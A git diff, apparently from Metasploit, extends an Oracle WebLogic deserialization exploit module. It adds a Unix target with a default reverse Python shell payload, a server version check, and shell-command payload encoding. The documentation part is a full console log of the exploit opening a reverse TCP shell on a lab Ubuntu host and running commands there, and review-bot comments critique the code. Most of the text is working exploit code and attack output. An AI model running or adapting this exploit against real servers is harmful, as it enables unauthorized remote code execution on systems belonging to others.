diff --git a/documentation/modules/exploit/windows/misc/weblogic_deserialize.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md
similarity index 52%
rename from documentation/modules/exploit/windows/misc/weblogic_deserialize.md
rename to documentation/modules/exploit/multi/misc/weblogic_deserialize.md
index ce303d7498..59a1ec2406 100644
--- a/documentation/modules/exploit/windows/misc/weblogic_deserialize.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md
@@ -45,3 +45,39 @@ Logged On Users : 2
 Meterpreter : x86/windows
 meterpreter >
 ```
+
+### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29
+```
+msf5 > use exploit/windows/misc/weblogic_deserialize
+msf5 exploit(windows/misc/weblogic_deserialize) > set rhosts 172.22.222.205
+rhosts => 172.22.222.205
+msf5 exploit(windows/misc/weblogic_deserialize) > set lhost 172.22.222.197
+lhost => 172.22.222.197
+msf5 exploit(windows/misc/weblogic_deserialize) > set srvhost 172.22.222.197
+srvhost => 172.22.222.197
+msf5 exploit(windows/misc/weblogic_deserialize) > set verbose true
+verbose => true
+msf5 exploit(windows/misc/weblogic_deserialize) > check
+
+[+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0
+[*] 172.22.222.205:7001 The target appears to be vulnerable.
+msf5 exploit(windows/misc/weblogic_deserialize) > run
+[*] Exploit running as background job 2.
+msf5 exploit(windows/misc/weblogic_deserialize) >
+[*] Started reverse TCP handler on 172.22.222.197:4444
+[*] 172.22.222.205:7001 - Sending handshake...
+[*] 172.22.222.205:7001 - Sending client object payload...
+[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
+[*] 172.22.222.205:7001 - Sending payload to client: 172.22.222.205
+[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
+[*] Command shell session 1 opened (172.22.222.197:4444 -> 172.22.222.205:35904) at 2018-08-28 10:59:20 -0500
+[*] 172.22.222.205:7001 - Server stopped.
+msf5 exploit(windows/misc/weblogic_deserialize) >
+sessions -i 1
+[*] Starting interaction with 1...
+
+whoami
+msfdev
+uname -a
+Linux ubuntu 4.4.0-134-generic #160~14.04.1-Ubuntu SMP Fri Aug 17 11:07:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+```
diff --git a/modules/exploits/windows/misc/weblogic_deserialize.rb b/modules/exploits/multi/misc/weblogic_deserialize.rb
similarity index 89%
rename from modules/exploits/windows/misc/weblogic_deserialize.rb
rename to modules/exploits/multi/misc/weblogic_deserialize.rb
index 7d22d3e7b8..9209a780cb 100644
--- a/modules/exploits/windows/misc/weblogic_deserialize.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize.rb
@@ -34,10 +34,20 @@ class MetasploitModule < Msf::Exploit::Remote
 'Privileged' => false,
 'Targets' => [
- [ 'Windows',
- {
- 'Platform' => ['win']
+ [ 'Unix',
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
+ 'Payload' => {
+ 'Encoder' => 'cmd/ifs',
+ 'BadChars' => ' ',
+ 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
 }
+ ],
+ [ 'Windows',
+ 'Platform' => 'win',
+ 'Payload' => {},
+ 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
 ]
 ],
 'DefaultTarget' => 0,
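Review bot: With `'DefaultTarget' => 0` kept as context, placing the new Unix entry first silently changes the module's default target from Windows to Unix; that switch deserves a mention in the module description or a comment on the target table, since existing users relied on the implicit Windows default. The Unix entry's constraints `'BadChars' => ' '`, `'Encoder' => 'cmd/ifs'` and `'RequiredCmd' => 'python'` are given without explanation; a one-line comment above the entry stating why whitespace must not appear in the delivered command and why only python-capable cmd payloads are compatible would stop the next maintainer from relaxing them. `'Payload' => {}` on the Windows target is an empty hash that adds nothing and can be dropped.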
@@ -48,10 +58,47 @@ class MetasploitModule < Msf::Exploit::Remote
 'DisclosureDate' => 'Apr 17 2018'))
 end
+ def check
+ connect
+ req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
+ req << "Host: #{peer}\n\n"
+ sock.put(req)
+
+ res = sock.get_once
+ disconnect
+ return CheckCode::Unknown unless res
+
+ /WebLogic Server Version: (?\d+\.\d+\.\d+\.*\d*)/ =~ res
+ if version
+ version = Gem::Version.new(version)
+ vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")
+
+ case
+ when version.to_s.start_with?('10.3')
+ return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
+ when version.to_s.start_with?('12.1')
+ return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
+ when version.to_s.start_with?('12.2')
+ return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3')
+ end
+ end
+
+ if res.include?('Oracle WebLogic Server Administration Console')
+ return CheckCode::Detected
+ end
+
+ CheckCode::Unknown
+ end
+
 def gen_resp
- pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
- pwrshl.gsub!("%COMSPEC%", "cmd.exe")
- tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+ if target.name == 'Windows'
+ pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
+ tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+ else
+ nix_cmd = payload.encoded
+ nix_cmd.prepend('/bin/sh -c ')
+ tmp_dat = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
+ end
 mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
 mycmd << tmp_dat
@@ -140,7 +187,6 @@ class MetasploitModule < Msf::Exploit::Remote
 @resp << '7e005a'
 end
-
 def on_client_connect(client)
 # Make sure to only sent one meterpreter payload to a host.
 # During testing the remote host called back up to 11 times
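Review bot: Both new `tmp_dat` assignments in gen_resp hex-encode with `b.to_s(16)`, which yields a single digit for any byte below 0x10 (tab, newline), so the hex string is no longer two characters per byte and the length prefix derived from `tmp_dat.length >> 1` on the following context line disagrees with the real byte count; the Windows branch inherits this from the removed lines, but the Unix branch now pushes an arbitrary `payload.encoded` command through the same path. `tmp_dat = pwrshl.unpack('H*').first` and `tmp_dat = nix_cmd.unpack('H*').first` give a correctly padded string with the same output for bytes that already encoded to two digits. In check, `#{version.to_s}` is redundant inside interpolation (`#{version}`), and because `res` is a single `sock.get_once` read, a response arriving in several segments may not yet contain the version banner — presumably rare, but a bounded read loop would make the Appears result less timing-dependent. The version regex as rendered here shows `(?\d+` with no group name; the `if version` on the next line suggests a named capture such as `(?<version>…)` that the page rendering dropped, which is worth confirming against the actual file. gen_resp's body continues past the end of the hunk.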
@@ -149,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
 if @met_sent.include?(client.peerhost) then return end
 @met_sent << client.peerhost
- vprint_status("met_sent: #{@met_sent}")
+ vprint_status("Sending payload to client: #{client.peerhost}")
 # Response format determined by watching network traffic
 # generated by EDB PoC
@@ -304,7 +350,7 @@ class MetasploitModule < Msf::Exploit::Remote
 start_service
- vprint_status('Sending payload...')
+ print_status('Sending client object payload...')
 send_payload_objdata
 # Need to wait this long to make sure we get a shell back